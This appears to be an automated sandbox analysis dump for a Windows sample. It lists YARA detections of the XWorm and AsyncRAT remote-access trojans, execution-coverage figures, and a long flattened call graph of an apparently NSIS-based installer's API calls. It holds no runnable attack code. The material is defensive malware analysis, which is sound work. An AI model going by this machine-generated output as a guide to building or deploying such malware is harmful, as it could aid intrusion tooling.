                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000028.00000002.4141599623.00000000005C2000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000028.00000002.4141599623.00000000005C2000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000028.00000002.4146462832.0000000002871000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 0%, ReversingLabs
                                                                      Has exited:false


                                                                        Execution Graph

                                                                        Execution Coverage:17.8%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:20.7%
                                                                        Total number of Nodes:1526
                                                                        Total number of Limit Nodes:33
                                                                        execution_graph (interactive call-graph viewer: function addresses, API calls and call edges; graph data not rendered as text)
3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3965 403c83 3640->3965 3641->3640 3647 405cb5 
3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4022 406009 lstrcpynW 3651->4022 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4023 405e50 GetFileAttributesW CreateFileW 3674->4023 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4026 406009 lstrcpynW 3684->4026 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4024 405f51 wsprintfW 3696->4024 4025 406009 lstrcpynW 3696->4025 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4027 
406a99 lstrcpyW 3704->4027 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 
3774 40634f PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3964 406009 lstrcpynW 3820->3964 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3914 40160c 3834->3914 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 
3844 401693 3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3914 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3947 40145c 3842->3947 3859 40145c 18 API calls 3843->3859 3941 401446 3844->3941 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3914 3847->3914 3963 405f51 wsprintfW 3847->3963 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3914 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3914 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3914 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3914 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3914 3879 4062a3 11 API calls 3868->3879 3869->3914 3870->3914 3871->3914 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3959 4062d5 FindFirstFileW 3874->3959 3885 40197f 3875->3885 3927 4019a1 3875->3927 3877 40169a 3944 4062a3 lstrlenW wvsprintfW 3877->3944 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3909 4062d5 2 API calls 3885->3909 3885->3927 3886 4062a3 11 API calls 3894 4017c9 3886->3894 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3914 3907 404f72 25 API calls 3892->3907 3952 405d59 CharNextW CharNextW 3894->3952 3896 4019b8 GetShortPathNameW 3896->3914 3905 4018f5 3897->3905 3898->3914 3899->3914 3906 4062a3 11 API calls 
3900->3906 3901 4018c2 3910 4062a3 11 API calls 3901->3910 3902 4018a9 3908 4062a3 11 API calls 3902->3908 3912 4062a3 11 API calls 3905->3912 3906->3914 3907->3914 3908->3914 3913 401991 3909->3913 3910->3914 3911 4017d4 3915 401864 3911->3915 3918 405d06 CharNextW 3911->3918 3936 4062a3 11 API calls 3911->3936 3916 401902 MoveFileW 3912->3916 3913->3927 3962 406009 lstrcpynW 3913->3962 3914->3832 3915->3892 3917 40186e 3915->3917 3919 401912 3916->3919 3920 40191e 3916->3920 3921 404f72 25 API calls 3917->3921 3923 4017e6 CreateDirectoryW 3918->3923 3919->3892 3925 401942 3920->3925 3930 4062d5 2 API calls 3920->3930 3926 401875 3921->3926 3923->3911 3924 4017fe GetLastError 3923->3924 3928 401827 GetFileAttributesW 3924->3928 3929 40180b GetLastError 3924->3929 3935 4062a3 11 API calls 3925->3935 3958 406009 lstrcpynW 3926->3958 3927->3896 3927->3914 3928->3911 3932 4062a3 11 API calls 3929->3932 3933 401929 3930->3933 3932->3911 3933->3925 3938 406c68 42 API calls 3933->3938 3934 401882 SetCurrentDirectoryW 3934->3914 3937 40195c 3935->3937 3936->3911 3937->3914 3939 401936 3938->3939 3940 404f72 25 API calls 3939->3940 3940->3925 3942 406805 18 API calls 3941->3942 3943 401455 3942->3943 3943->3877 3945 4060e7 9 API calls 3944->3945 3946 4016a7 Sleep 3945->3946 3946->3914 3948 406805 18 API calls 3947->3948 3949 401488 3948->3949 3950 401497 3949->3950 3951 406038 5 API calls 3949->3951 3950->3886 3951->3950 3953 405d76 3952->3953 3954 405d88 3952->3954 3953->3954 3955 405d83 CharNextW 3953->3955 3956 405dac 3954->3956 3957 405d06 CharNextW 3954->3957 3955->3956 3956->3911 3957->3954 3958->3934 3960 4018a5 3959->3960 3961 4062eb FindClose 3959->3961 3960->3901 3960->3902 3961->3960 3962->3927 3963->3914 3964->3822 3966 403c91 3965->3966 3967 403876 3966->3967 3968 403c96 FreeLibrary GlobalFree 3966->3968 3969 406c9b 3967->3969 3968->3967 3968->3968 3970 40677e 18 API calls 3969->3970 3971 406cae 3970->3971 3972 406cb7 DeleteFileW 3971->3972 3973 406cce 
3971->3973 4013 403882 CoUninitialize 3972->4013 3974 406e4b 3973->3974 4017 406009 lstrcpynW 3973->4017 3980 4062d5 2 API calls 3974->3980 4002 406e58 3974->4002 3974->4013 3976 406cf9 3977 406d03 lstrcatW 3976->3977 3978 406d0d 3976->3978 3979 406d13 3977->3979 3981 406751 2 API calls 3978->3981 3983 406d23 lstrcatW 3979->3983 3984 406d19 3979->3984 3982 406e64 3980->3982 3981->3979 3987 406722 3 API calls 3982->3987 3982->4013 3986 406d2b lstrlenW FindFirstFileW 3983->3986 3984->3983 3984->3986 3985 4062a3 11 API calls 3985->4013 3988 406e3b 3986->3988 3992 406d52 3986->3992 3989 406e6e 3987->3989 3988->3974 3991 4062a3 11 API calls 3989->3991 3990 405d06 CharNextW 3990->3992 3993 406e79 3991->3993 3992->3990 3996 406e18 FindNextFileW 3992->3996 4005 406c9b 72 API calls 3992->4005 4012 404f72 25 API calls 3992->4012 4014 4062a3 11 API calls 3992->4014 4015 404f72 25 API calls 3992->4015 4016 406c68 42 API calls 3992->4016 4018 406009 lstrcpynW 3992->4018 4019 405e30 GetFileAttributesW 3992->4019 3994 405e30 2 API calls 3993->3994 3995 406e81 RemoveDirectoryW 3994->3995 3999 406ec4 3995->3999 4000 406e8d 3995->4000 3996->3992 3998 406e30 FindClose 3996->3998 3998->3988 4001 404f72 25 API calls 3999->4001 4000->4002 4003 406e93 4000->4003 4001->4013 4002->3985 4004 4062a3 11 API calls 4003->4004 4006 406e9d 4004->4006 4005->3992 4008 404f72 25 API calls 4006->4008 4010 406ea7 4008->4010 4011 406c68 42 API calls 4010->4011 4011->4013 4012->3996 4013->3491 4013->3492 4014->3992 4015->3992 4016->3992 4017->3976 4018->3992 4020 405e4d DeleteFileW 4019->4020 4021 405e3f SetFileAttributesW 4019->4021 4020->3992 4021->4020 4022->3653 4023->3677 4024->3696 4025->3696 4026->3685 4028 406ae7 GetShortPathNameW 4027->4028 4029 406abe 4027->4029 4030 406b00 4028->4030 4031 406c62 4028->4031 4053 405e50 GetFileAttributesW CreateFileW 4029->4053 4030->4031 4033 406b08 WideCharToMultiByte 4030->4033 4031->3706 4033->4031 4035 406b25 WideCharToMultiByte 4033->4035 4034 406ac7 
CloseHandle GetShortPathNameW 4034->4031 4036 406adf 4034->4036 4035->4031 4037 406b3d wsprintfA 4035->4037 4036->4028 4036->4031 4038 406805 18 API calls 4037->4038 4039 406b69 4038->4039 4054 405e50 GetFileAttributesW CreateFileW 4039->4054 4041 406b76 4041->4031 4042 406b83 GetFileSize GlobalAlloc 4041->4042 4043 406ba4 ReadFile 4042->4043 4044 406c58 CloseHandle 4042->4044 4043->4044 4045 406bbe 4043->4045 4044->4031 4045->4044 4055 405db6 lstrlenA 4045->4055 4048 406bd7 lstrcpyA 4051 406bf9 4048->4051 4049 406beb 4050 405db6 4 API calls 4049->4050 4050->4051 4052 406c30 SetFilePointer WriteFile GlobalFree 4051->4052 4052->4044 4053->4034 4054->4041 4056 405df7 lstrlenA 4055->4056 4057 405dd0 lstrcmpiA 4056->4057 4058 405dff 4056->4058 4057->4058 4059 405dee CharNextA 4057->4059 4058->4048 4058->4049 4059->4056 4940 402a84 4941 401553 19 API calls 4940->4941 4942 402a8e 4941->4942 4943 401446 18 API calls 4942->4943 4944 402a98 4943->4944 4945 401a13 4944->4945 4946 402ab2 RegEnumKeyW 4944->4946 4947 402abe RegEnumValueW 4944->4947 4948 402a7e 4946->4948 4947->4945 4947->4948 4948->4945 4949 4029e4 RegCloseKey 4948->4949 4949->4945 4950 402c8a 4951 402ca2 4950->4951 4952 402c8f 4950->4952 4954 40145c 18 API calls 4951->4954 4953 401446 18 API calls 4952->4953 4956 402c97 4953->4956 4955 402ca9 lstrlenW 4954->4955 4955->4956 4957 402ccb WriteFile 4956->4957 4958 401a13 4956->4958 4957->4958 4959 40400d 4960 40406a 4959->4960 4961 40401a lstrcpynA lstrlenA 4959->4961 4961->4960 4962 40404b 4961->4962 4962->4960 4963 404057 GlobalFree 4962->4963 4963->4960 4964 401d8e 4965 40145c 18 API calls 4964->4965 4966 401d95 ExpandEnvironmentStringsW 4965->4966 4967 401da8 4966->4967 4969 401db9 4966->4969 4968 401dad lstrcmpW 4967->4968 4967->4969 4968->4969 4970 401e0f 4971 401446 18 API calls 4970->4971 4972 401e17 4971->4972 4973 401446 18 API calls 4972->4973 4974 401e21 4973->4974 4975 4030e3 4974->4975 4977 405f51 wsprintfW 4974->4977 4977->4975 4978 402392 4979 
40145c 18 API calls 4978->4979 4980 402399 4979->4980 4983 4071f8 4980->4983 4984 406ed2 25 API calls 4983->4984 4985 407218 4984->4985 4986 407222 lstrcpynW lstrcmpW 4985->4986 4987 4023a7 4985->4987 4988 407254 4986->4988 4989 40725a lstrcpynW 4986->4989 4988->4989 4989->4987 4060 402713 4075 406009 lstrcpynW 4060->4075 4062 40272c 4076 406009 lstrcpynW 4062->4076 4064 402738 4065 40145c 18 API calls 4064->4065 4067 402743 4064->4067 4065->4067 4066 402752 4069 40145c 18 API calls 4066->4069 4071 402761 4066->4071 4067->4066 4068 40145c 18 API calls 4067->4068 4068->4066 4069->4071 4070 40145c 18 API calls 4072 40276b 4070->4072 4071->4070 4073 4062a3 11 API calls 4072->4073 4074 40277f WritePrivateProfileStringW 4073->4074 4075->4062 4076->4064 4990 402797 4991 40145c 18 API calls 4990->4991 4992 4027ae 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027b7 4993->4994 4995 40145c 18 API calls 4994->4995 4996 4027c0 GetPrivateProfileStringW lstrcmpW 4995->4996 4997 402e18 4998 40145c 18 API calls 4997->4998 4999 402e1f FindFirstFileW 4998->4999 5000 402e32 4999->5000 5005 405f51 wsprintfW 5000->5005 5002 402e43 5006 406009 lstrcpynW 5002->5006 5004 402e50 5005->5002 5006->5004 5007 401e9a 5008 40145c 18 API calls 5007->5008 5009 401ea1 5008->5009 5010 401446 18 API calls 5009->5010 5011 401eab wsprintfW 5010->5011 4287 401a1f 4288 40145c 18 API calls 4287->4288 4289 401a26 4288->4289 4290 4062a3 11 API calls 4289->4290 4291 401a49 4290->4291 4292 401a64 4291->4292 4293 401a5c 4291->4293 4341 406009 lstrcpynW 4292->4341 4340 406009 lstrcpynW 4293->4340 4296 401a62 4300 406038 5 API calls 4296->4300 4297 401a6f 4298 406722 3 API calls 4297->4298 4299 401a75 lstrcatW 4298->4299 4299->4296 4302 401a81 4300->4302 4301 4062d5 2 API calls 4301->4302 4302->4301 4303 405e30 2 API calls 4302->4303 4305 401a98 CompareFileTime 4302->4305 4306 401ba9 4302->4306 4310 4062a3 11 API calls 4302->4310 4314 406009 lstrcpynW 4302->4314 4320 406805 18 API calls 4302->4320 4327 
405ca0 MessageBoxIndirectW 4302->4327 4331 401b50 4302->4331 4338 401b5d 4302->4338 4339 405e50 GetFileAttributesW CreateFileW 4302->4339 4303->4302 4305->4302 4307 404f72 25 API calls 4306->4307 4309 401bb3 4307->4309 4308 404f72 25 API calls 4311 401b70 4308->4311 4312 40337f 37 API calls 4309->4312 4310->4302 4315 4062a3 11 API calls 4311->4315 4313 401bc6 4312->4313 4316 4062a3 11 API calls 4313->4316 4314->4302 4322 401b8b 4315->4322 4317 401bda 4316->4317 4318 401be9 SetFileTime 4317->4318 4319 401bf8 CloseHandle 4317->4319 4318->4319 4321 401c09 4319->4321 4319->4322 4320->4302 4323 401c21 4321->4323 4324 401c0e 4321->4324 4326 406805 18 API calls 4323->4326 4325 406805 18 API calls 4324->4325 4328 401c16 lstrcatW 4325->4328 4329 401c29 4326->4329 4327->4302 4328->4329 4330 4062a3 11 API calls 4329->4330 4332 401c34 4330->4332 4333 401b93 4331->4333 4334 401b53 4331->4334 4335 405ca0 MessageBoxIndirectW 4332->4335 4336 4062a3 11 API calls 4333->4336 4337 4062a3 11 API calls 4334->4337 4335->4322 4336->4322 4337->4338 4338->4308 4339->4302 4340->4296 4341->4297 5012 40209f GetDlgItem GetClientRect 5013 40145c 18 API calls 5012->5013 5014 4020cf LoadImageW SendMessageW 5013->5014 5015 4030e3 5014->5015 5016 4020ed DeleteObject 5014->5016 5016->5015 5017 402b9f 5018 401446 18 API calls 5017->5018 5023 402ba7 5018->5023 5019 402c4a 5020 402bdf ReadFile 5022 402c3d 5020->5022 5020->5023 5021 401446 18 API calls 5021->5022 5022->5019 5022->5021 5029 402d17 ReadFile 5022->5029 5023->5019 5023->5020 5023->5022 5024 402c06 MultiByteToWideChar 5023->5024 5025 402c3f 5023->5025 5027 402c4f 5023->5027 5024->5023 5024->5027 5030 405f51 wsprintfW 5025->5030 5027->5022 5028 402c6b SetFilePointer 5027->5028 5028->5022 5029->5022 5030->5019 5031 402b23 GlobalAlloc 5032 402b39 5031->5032 5033 402b4b 5031->5033 5034 401446 18 API calls 5032->5034 5035 40145c 18 API calls 5033->5035 5036 402b41 5034->5036 5037 402b52 WideCharToMultiByte lstrlenA 5035->5037 5038 402b93 
5036->5038 5039 402b84 WriteFile 5036->5039 5037->5036 5039->5038 5040 402384 GlobalFree 5039->5040 5040->5038 5042 4044a5 5043 404512 5042->5043 5044 4044df 5042->5044 5046 40451f GetDlgItem GetAsyncKeyState 5043->5046 5053 4045b1 5043->5053 5110 405c84 GetDlgItemTextW 5044->5110 5049 40453e GetDlgItem 5046->5049 5056 40455c 5046->5056 5047 4044ea 5050 406038 5 API calls 5047->5050 5048 40469d 5108 404833 5048->5108 5112 405c84 GetDlgItemTextW 5048->5112 5051 403d3f 19 API calls 5049->5051 5052 4044f0 5050->5052 5055 404551 ShowWindow 5051->5055 5058 403e74 5 API calls 5052->5058 5053->5048 5059 406805 18 API calls 5053->5059 5053->5108 5055->5056 5061 404579 SetWindowTextW 5056->5061 5066 405d59 4 API calls 5056->5066 5057 403dca 8 API calls 5062 404847 5057->5062 5063 4044f5 GetDlgItem 5058->5063 5064 40462f SHBrowseForFolderW 5059->5064 5060 4046c9 5065 40677e 18 API calls 5060->5065 5067 403d3f 19 API calls 5061->5067 5068 404503 IsDlgButtonChecked 5063->5068 5063->5108 5064->5048 5069 404647 CoTaskMemFree 5064->5069 5070 4046cf 5065->5070 5071 40456f 5066->5071 5072 404597 5067->5072 5068->5043 5073 406722 3 API calls 5069->5073 5113 406009 lstrcpynW 5070->5113 5071->5061 5077 406722 3 API calls 5071->5077 5074 403d3f 19 API calls 5072->5074 5075 404654 5073->5075 5078 4045a2 5074->5078 5079 40468b SetDlgItemTextW 5075->5079 5084 406805 18 API calls 5075->5084 5077->5061 5111 403d98 SendMessageW 5078->5111 5079->5048 5080 4046e6 5082 4062fc 3 API calls 5080->5082 5091 4046ee 5082->5091 5083 4045aa 5087 4062fc 3 API calls 5083->5087 5085 404673 lstrcmpiW 5084->5085 5085->5079 5088 404684 lstrcatW 5085->5088 5086 404730 5114 406009 lstrcpynW 5086->5114 5087->5053 5088->5079 5090 404739 5092 405d59 4 API calls 5090->5092 5091->5086 5096 406751 2 API calls 5091->5096 5097 404785 5091->5097 5093 40473f GetDiskFreeSpaceW 5092->5093 5095 404763 MulDiv 5093->5095 5093->5097 5095->5097 5096->5091 5099 4047e2 5097->5099 5100 4043ad 21 API calls 5097->5100 5098 404805 
5115 403d85 KiUserCallbackDispatcher 5098->5115 5099->5098 5101 40141d 80 API calls 5099->5101 5102 4047d3 5100->5102 5101->5098 5104 4047e4 SetDlgItemTextW 5102->5104 5105 4047d8 5102->5105 5104->5099 5106 4043ad 21 API calls 5105->5106 5106->5099 5107 404821 5107->5108 5116 403d61 5107->5116 5108->5057 5110->5047 5111->5083 5112->5060 5113->5080 5114->5090 5115->5107 5117 403d74 SendMessageW 5116->5117 5118 403d6f 5116->5118 5117->5108 5118->5117 5119 402da5 5120 4030e3 5119->5120 5121 402dac 5119->5121 5122 401446 18 API calls 5121->5122 5123 402db8 5122->5123 5124 402dbf SetFilePointer 5123->5124 5124->5120 5125 402dcf 5124->5125 5125->5120 5127 405f51 wsprintfW 5125->5127 5127->5120 5128 4030a9 SendMessageW 5129 4030c2 InvalidateRect 5128->5129 5130 4030e3 5128->5130 5129->5130 5131 401cb2 5132 40145c 18 API calls 5131->5132 5133 401c54 5132->5133 5134 4062a3 11 API calls 5133->5134 5137 401c64 5133->5137 5135 401c59 5134->5135 5136 406c9b 81 API calls 5135->5136 5136->5137 4087 4021b5 4088 40145c 18 API calls 4087->4088 4089 4021bb 4088->4089 4090 40145c 18 API calls 4089->4090 4091 4021c4 4090->4091 4092 40145c 18 API calls 4091->4092 4093 4021cd 4092->4093 4094 40145c 18 API calls 4093->4094 4095 4021d6 4094->4095 4096 404f72 25 API calls 4095->4096 4097 4021e2 ShellExecuteW 4096->4097 4098 40221b 4097->4098 4099 40220d 4097->4099 4101 4062a3 11 API calls 4098->4101 4100 4062a3 11 API calls 4099->4100 4100->4098 4102 402230 4101->4102 5145 402238 5146 40145c 18 API calls 5145->5146 5147 40223e 5146->5147 5148 4062a3 11 API calls 5147->5148 5149 40224b 5148->5149 5150 404f72 25 API calls 5149->5150 5151 402255 5150->5151 5152 405c3f 2 API calls 5151->5152 5153 40225b 5152->5153 5154 4062a3 11 API calls 5153->5154 5157 4022ac CloseHandle 5153->5157 5160 40226d 5154->5160 5156 4030e3 5157->5156 5158 402283 WaitForSingleObject 5159 402291 GetExitCodeProcess 5158->5159 5158->5160 5159->5157 5162 4022a3 5159->5162 5160->5157 5160->5158 5161 406332 2 API calls 
5160->5161 5161->5158 5164 405f51 wsprintfW 5162->5164 5164->5157 5165 4040b8 5166 4040d3 5165->5166 5174 404201 5165->5174 5170 40410e 5166->5170 5196 403fca WideCharToMultiByte 5166->5196 5167 40426c 5168 404276 GetDlgItem 5167->5168 5169 40433e 5167->5169 5171 404290 5168->5171 5172 4042ff 5168->5172 5175 403dca 8 API calls 5169->5175 5177 403d3f 19 API calls 5170->5177 5171->5172 5180 4042b6 6 API calls 5171->5180 5172->5169 5181 404311 5172->5181 5174->5167 5174->5169 5176 40423b GetDlgItem SendMessageW 5174->5176 5179 404339 5175->5179 5201 403d85 KiUserCallbackDispatcher 5176->5201 5178 40414e 5177->5178 5183 403d3f 19 API calls 5178->5183 5180->5172 5184 404327 5181->5184 5185 404317 SendMessageW 5181->5185 5188 40415b CheckDlgButton 5183->5188 5184->5179 5189 40432d SendMessageW 5184->5189 5185->5184 5186 404267 5187 403d61 SendMessageW 5186->5187 5187->5167 5199 403d85 KiUserCallbackDispatcher 5188->5199 5189->5179 5191 404179 GetDlgItem 5200 403d98 SendMessageW 5191->5200 5193 40418f SendMessageW 5194 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5193->5194 5195 4041ac GetSysColor 5193->5195 5194->5179 5195->5194 5197 404007 5196->5197 5198 403fe9 GlobalAlloc WideCharToMultiByte 5196->5198 5197->5170 5198->5197 5199->5191 5200->5193 5201->5186 4196 401eb9 4197 401f24 4196->4197 4198 401ec6 4196->4198 4199 401f53 GlobalAlloc 4197->4199 4200 401f28 4197->4200 4201 401ed5 4198->4201 4208 401ef7 4198->4208 4202 406805 18 API calls 4199->4202 4207 4062a3 11 API calls 4200->4207 4212 401f36 4200->4212 4203 4062a3 11 API calls 4201->4203 4206 401f46 4202->4206 4204 401ee2 4203->4204 4209 402708 4204->4209 4214 406805 18 API calls 4204->4214 4206->4209 4210 402387 GlobalFree 4206->4210 4207->4212 4218 406009 lstrcpynW 4208->4218 